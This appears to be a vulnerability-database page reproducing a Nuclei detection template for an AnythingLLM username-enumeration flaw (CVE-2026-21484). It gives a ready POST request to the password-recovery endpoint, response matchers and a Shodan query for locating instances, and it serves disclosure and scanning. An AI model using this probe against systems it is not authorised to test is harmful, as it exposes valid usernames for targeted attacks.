Lucene search
K

AnythingLLM - Username Enumeration via Password Recovery

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

AnythingLLM exposed username enumeration via password recovery; fixed under CVE-2026-21484.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2026-21484
15 Apr 202606:48
circl
CNNVD
AnythingLLM 安全漏洞
3 Jan 202600:00
cnnvd
CVE
CVE-2026-21484
3 Jan 202601:21
cve
Cvelist
CVE-2026-21484 AnythingLLM Vulnerable to Username Enumeration w/ Password Recovery
3 Jan 202601:21
cvelist
EUVD
EUVD-2026-0774
3 Jan 202601:21
euvd
NVD
CVE-2026-21484
3 Jan 202602:15
nvd
OSV
CVE-2026-21484 AnythingLLM Vulnerable to Username Enumeration w/ Password Recovery
3 Jan 202601:21
osv
Positive Technologies
PT-2026-1141
3 Jan 202600:00
ptsecurity
RedhatCVE
CVE-2026-21484
4 Jan 202602:07
redhatcve
Vulnrichment
CVE-2026-21484 AnythingLLM Vulnerable to Username Enumeration w/ Password Recovery
3 Jan 202601:21
vulnrichment
Rows per page
id: CVE-2026-21484

info:
  name: AnythingLLM - Username Enumeration via Password Recovery
  author: DhiyaneshDk
  severity: medium
  description: |
    AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to commit e287fab56089cf8fcea9ba579a3ecdeca0daa313, the password recovery endpoint returns different error messages depending on whether a username exists, so enabling username enumeration. Commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 fixes this issue.
  impact: |
    Attackers can enumerate valid usernames, aiding further targeted attacks or social engineering.
  remediation: Update to the version including commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 or later.
  reference:
    - https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-47vr-w3vm-69ch
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-21484
    epss-score: 0.00713
    epss-percentile: 0.49195
    cwe-id: CWE-203,CWE-204
  metadata:
    verified: true
    max-request: 2
    vendor: mintplex-labs
    product: anything-llm
    shodan-query: http.favicon.hash:-1279687529
  tags: cve,cve2026,anythingllm,user-enum

variables:
  rc1: "{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}"
  rc2: "{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}"
  rc3: "{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}"
  rc4: "{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}"

http:
  - raw:
      - |
        POST /api/system/recover-account HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{randstr}}","recoveryCodes":["{{rc3}}","{{rc4}}"]}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains_all(body, "Invalid recovery codes","success")'
        condition: and
# digest: 4b0a004830460221008c8979d81a0222a5274ba5c087de951dcf7541317832749260a22f8559d1f8110221009f322ec6f519d45fd5ad1e4a3769a4ee315feaa8d6090f17bf274162259cc3ba:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2026 06:48Current
6Medium risk
Vulners AI Score6
CVSS 3.15.3
EPSS0.00713
SSVC
21